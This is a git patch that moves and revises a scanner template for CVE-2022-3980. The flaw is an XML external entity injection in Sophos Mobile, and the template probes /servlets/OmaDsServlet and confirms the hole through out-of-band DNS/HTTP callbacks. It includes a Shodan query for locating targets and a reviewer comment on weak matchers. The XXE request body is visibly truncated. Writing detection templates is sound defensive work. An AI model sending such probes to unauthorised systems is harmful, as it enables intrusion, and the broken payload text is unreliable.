From b79431ad43a8addbfaa7e40e5a178e2e3a168c92 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 9 May 2023 21:45:10 +0530
Subject: [PATCH] updated path and matchers
---
http/cves/2022/CVE-2022-3980.yaml | 48 +++++++++++++++++++
.../sophos-mobile-xxe_cve-2022-3980.yaml | 42 ----------------
2 files changed, 48 insertions(+), 42 deletions(-)
create mode 100644 http/cves/2022/CVE-2022-3980.yaml
delete mode 100644 http/vulnerabilities/other/sophos-mobile-xxe_cve-2022-3980.yaml
diff --git a/http/cves/2022/CVE-2022-3980.yaml b/http/cves/2022/CVE-2022-3980.yaml
new file mode 100644
index 0000000000..e7afb917c1
--- /dev/null
+++ b/http/cves/2022/CVE-2022-3980.yaml
@@ -0,0 +1,48 @@
+id: CVE-2022-3980
+
+info:
+ name: Sophos Mobile managed on-premises - XML External Entity Injection
+ author: dabla
+ severity: critical
+ description: |
+ An XML External Entity (XEE) vulnerability allows server-side request forgery (SSRF) and potential code execution in Sophos Mobile managed on-premises between versions 5.0.0 and 9.7.4.
+ reference:
+ - https://www.sophos.com/en-us/security-advisories/sophos-sa-20221116-smc-xee
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-3980
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cwe-id: CWE-611
+ cve-id: CVE-2022-3980
+ metadata:
+ max-request: 1
+ verified: "true"
+ shodan-query: title:"Sophos Mobile"
+ tags: cve,cve2022,xxe,ssrf
+
+http:
+ - raw:
+ - |
+ @timeout: 50s
+ POST /servlets/OmaDsServlet HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: "application/xml"
+
+
+ %test;]>
+ test
+
+ redirects: true
+ max-redirects: 3
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "dns"
+ - "http"
+ condition: or
+
+ - type: status
+ status:
+ - 400
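Review bot: The matchers at the end of this hunk accept a DNS-only interaction as proof, and combined only with a generic `400` status that is thin evidence for a finding reported as `critical`. A resolver, proxy or inspection device in the path may look up a hostname it sees in a request body without the target ever parsing the XML. Consider reporting only on the `http` interaction, or keeping `dns` and adding a third matcher on something specific to the servlet's response, so that a bare 400 from an unrelated server cannot satisfy the `and`. Separately, `Content-Type: "application/xml"` in the raw request sends the quotes literally, which is not a well-formed media type; unless the check is known to depend on that exact form, `Content-Type: application/xml` is the safer spelling. The `info` block would also benefit from a `remediation:` line pointing to the fixed release named in the referenced Sophos advisory.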
diff --git a/http/vulnerabilities/other/sophos-mobile-xxe_cve-2022-3980.yaml b/http/vulnerabilities/other/sophos-mobile-xxe_cve-2022-3980.yaml
deleted file mode 100644
index 756f446567..0000000000
--- a/http/vulnerabilities/other/sophos-mobile-xxe_cve-2022-3980.yaml
+++ /dev/null
@@ -1,42 +0,0 @@
-id: sophos-mobile-xxe_CVE-2022-3980
-
-info:
- name: XEE vulnerability in Sophos Mobile managed on-premises
- author: dabla
- severity: critical
- description: Checks exeecution of XXE Payload via dns canary
- reference: https://www.sophos.com/en-us/security-advisories/sophos-sa-20221116-smc-xee
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cwe-id: CWE-611
- cve-id: CVE-2022-3980
- tags: xxe,ssrf
-
-http:
- - raw:
- - |
- POST /servlets/OmaDsServlet HTTP/1.1
- Host: {{Hostname}}
- Content-Type: "application/xml"
-
-
- %test;]>
- test
-
- redirects: true
- max-redirects: 3
-
- matchers-condition: or
- matchers:
- - type: word
- part: interactsh_protocol
- name: http
- words:
- - "http"
-
- - type: word
- part: interactsh_protocol
- name: dns
- words:
- - "dns"
\ No newline at end of file